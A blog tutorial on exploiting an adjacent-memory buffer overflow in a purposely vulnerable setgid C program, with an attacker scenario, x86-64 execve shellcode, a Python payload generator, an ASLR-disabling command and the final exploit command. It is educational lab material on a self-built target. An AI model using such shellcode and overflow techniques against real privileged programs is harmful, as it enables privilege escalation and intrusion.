---
title: 'Adjacent memory buffer overflow attacks : An example'
date: 2020-05-21T01:56:31+00:00
layout: post
image: /images/2020/05/binary-2170633_1280.png
tags:
  - Cybersecurity
  - Geek Zone
---

In my [previous blog post][part-1], I described the theory behind adjacent memory buffer overflow attacks. The current article intends to provide a practical case of the attack in a step by step process. This is going to be a lot of technical stuff going on here but first let me set the stage. As an attacker, key factors driving an attack include a motive, a goal, and resources. Let me first start by giving a -hopefully- legit scenario of attack that will guide this whole process.

## Setting up the attack scenario

Recently, company X hired a new network administrator who will start in a week.  Having spied on the company for a while, the hacker knows that the company welcomes new IT employees by preparing a PDF document on a server and assigning the employees the job of finding and reading the file. Since no information is given to the new person on the location of the file, odds are that the employee will use utilities such as `locate` or `find` to find the file.

Bingo! The attacker who has been looking for a way to escalate their privileges then mimicked the legitimate file and included a malicious payload in it. The payload should help them install a virus on the system to perform various actions without being noticed. For this attack to work, the hacker first needs to make their own file indexable by the operating system. This will ensure that the new employee finds it and reads it. Fortunately there is a program on the system that is vulnerable to adjacent memory buffer overflow attacks and is owned by the root user group. The hacker smiles at this as they can exploit it to run the `updatedb` command.

## Environment and program details

All the code and resources used for this tutorial is available [here](https://gitlab.com/boladji/strncpy-buffer-overflow-example). The program has been executed on a Kali Linux 2020 x64 virtual machine and should work on any Linux distro. Address Space Layout Randomization protection has been disabled before the compilation of the program. This makes the exploitation easier as the stack keeps the same structure across executions. The following command can help perform the same on your machine.

```bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

Note that the setting will be removed after the system restarts and then you are safe running it like that. Apart from that, specific flags have been set while compiling the file to allow stack execution. The full compilation command is available in each of the files.

After compiling the program while being root (login as root or use sudo), make sure you set the SETGID bit for the permissions by running  
`chmod g+s student_record`. This should make the rights of the file look like in the below screenshot.

![](/images/2020/05/setgid.png)

The code of the program can be seen below:

```c
/*
 * This is a C program to demonstrate the adjacent memory buffer overflow vulnerability
 * Last modified: April 04th 2020
 * Author: Boladji Vinny - https://vinny.coach / @boladjivinny / https://gitlab.com/boladji
 * Licence: Free GPL
 *
*/ 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
	char record[265];
	char comments[128]; 
	char studentName[256]; 

	if(argc <= 2){
		 printf("Usage: %s [student] [comments]\n", argv[0]);
		 exit(0);
	}

	strncpy(studentName, argv[1], sizeof(studentName)); 
	strncpy(comments, argv[2], sizeof(comments)); 
	sprintf(record,"RECORD: %s",studentName);
	
	printf("%s\n",record);
	return(0);
}
```

## Part 1: Writing the exploit and testing it

For this part, we probably have the option to let a framework like `msfconsole` generate the payload for us but here we will do it all by ourselves. The first reason is that it always helps to know how and why things work and the second most important reason is that, `msfconsole` generates shellcode using the `bash -c` command which drops the `setgid` bit. This means that if we ever execute our program with the payload generated with this method, we will not be able to execute the updated command as this one requires root permission. In order to avoid this limitation, we will use our self-written shellcode in assembly.

What we are trying to do here is running a program from the code that we are writing. This involves running the `execve` system call with specific parameters. A quick look at the `execve` man page shows that we need to pass three parameters to the system call: the name of the program(i.e `updatedb`), the arguments to the call (the name of the program followed by a NULL pointer) and the environment variables details that we will set to null. Let’s take a look at what the stack should look like in order to execute the program.

![](/images/2020/05/Stack.png)

The below snippet shows the commented assembly code that achieves the proposed structure.

```c
// Compile with gcc -ggdb -Wl,--omagic -o exploit_asm exploit_asm.c -static \ 
// -fno-stack-protector -mpreferred-stack-boundary=3
//

int main()
{
__asm__(
    "jmp        jmptgt		\n\t"
    "aftjmp:    pop %rbx	\n\t"
    "xor        %rdx, %rdx	\n\t" // Get a 0 stored in rdx
    "push       %rdx		\n\t" // Push the value of rdx on the stack -> NULL
    "mov        %dl, 0x11(%rbx)	\n\t" // Replace the x in the executable path by \0
    "push       %rbx		\n\t" // Push the updated program path on the stack
    "mov        %rsp, %rsi	\n\t" // Copy the top of the stack into rsi (second argument). We have then an a string followed by NULL as expected by execve
    "push       %rbx		\n\t" // Push the string on the stack and pop into %rdi (first argument)
    "pop        %rdi		\n\t" 
    "pushq      $0x3b		\n\t"
    "pop        %rax		\n\t" // Store 13 system code and call syscall (run execve)
    "syscall                \n\t"
    "jmptgt:    call aftjmp	\n\t"
    ".string \"/usr/bin/updatedbx\""
             //0123456789abcdef01
   );
}
```


After compiling the code above, we then use gdb to disassemble it in order to recover the hexadecimal code of the program. This gives a payload of 46 bytes (a decent size for exploitation)

![](/images/2020/05/shellcode.png)

## Part 2: Analyze the stack to find a way to insert the malicious code

In order to verify that the program is actually vulnerable to a buffer overflow attack, let’s first run it against a custom input that will trigger the error. As previously explained [here][part-1], we need to fill the first field (256 bytes) and find the size for the second argument that triggers the error. Let's pass 256 characters to the first argument and 64 characters to the second one as seen below. This has triggered the buffer overflow attack as expected.

![adjacent buffer overflow attacks observed](/images/2020/05/buffer_overflow.png)

Now let’s analyze the stack to find out how to structure our payload to get to execute our program. A quick look at the registry yields the following results for the start and end pointers.

![](/images/2020/05/pointers.png)

We then take a look at the stack near the region following the record variable to find the exact location where we should put the payload and how to structure it. The observation of the stack shows the following result suggesting that we need 16 random bytes before putting the return address.

![](/images/2020/05/Analyzing_the_stack.png)

That means that we shall put the payload somewhere inside the first argument and put the return address of the malicious code in memory after 16 bytes of data into the second argument.

## Part 3: Exploiting the adjacent memory buffer overflow

We will use the Python programming language to write the payload insertable into the first and second arguments. For the first step, we insert some nop-sled (\x90 which instructs the compiler to do nothing) followed by the payload and then some data to fill the remaining space. Using this, we then analyze the stack to find the memory address to use as a return address for the attack. The code for generating the payload filling 256 bytes can be seen below:

```python
#!/usr/bin/python3

import sys

#Payload length: Size of the first input
payload_length = 256

# Payload
shellcode = b"\xeb\x13\x5b\x48\x31\xd2\x52\x88\x53\x11\x53\x48\x89\xe6\x53\x5f\x6a\x3b\x58\x0f\x05\xe8\xe8\xff\xff\xff/usr/bin/updatedbx"

nop_sled = b"\x90" * 128
padding = b"B" * (256 - len(nop_sled) - len(shellcode))

exploit = (nop_sled + shellcode + padding)

sys.stdout.buffer.write(exploit)
```


The address that we choose is 0x7fffffffdd90 as shown in the following figure:

![adjacent buffer overflow attacks - analysis](/images/2020/05/Finding_address.png)

This makes our exploit complete now and the full command to execute our malicious code is

```bash
./student_record `./payload.py `python3 -c "import sys; sys.stdout.buffer.write(b'C' * 16 + b'\x90\xdd\xff\xff\xff\x7f')"`
```

Since `updatedb` is a non-verbose program, we’ll have to open a new terminal while running the command in order to confirm that it’s working.

![](/images/2020/05/updatedb.png)

The figure above shows this from the output of running `ps waxu` on the machine. You would also notice that the program takes a lot of time before completing which is normal with `updatedb`.

## Security measures and final thoughts

The vulnerability discussed in this series of post is dangerous because of the sense of security the functions involved gives. However, they can lead to catastrophic outcomes if not considered seriously on systems that may be vulnerable. The easiest protection would be to programmatically ensure that the last byte of any string is the null byte.

For my part, I hope to have given a good explanation of adjacent memory buffer overflow attacks. Feel free to play around it and raise any ambiguities you may have noticed to my attention so that I can update the content as needed.


[part-1]: {% post_url 2020-05-18-Adjacent-memory-buffer-overflow-attack-part-1 %}
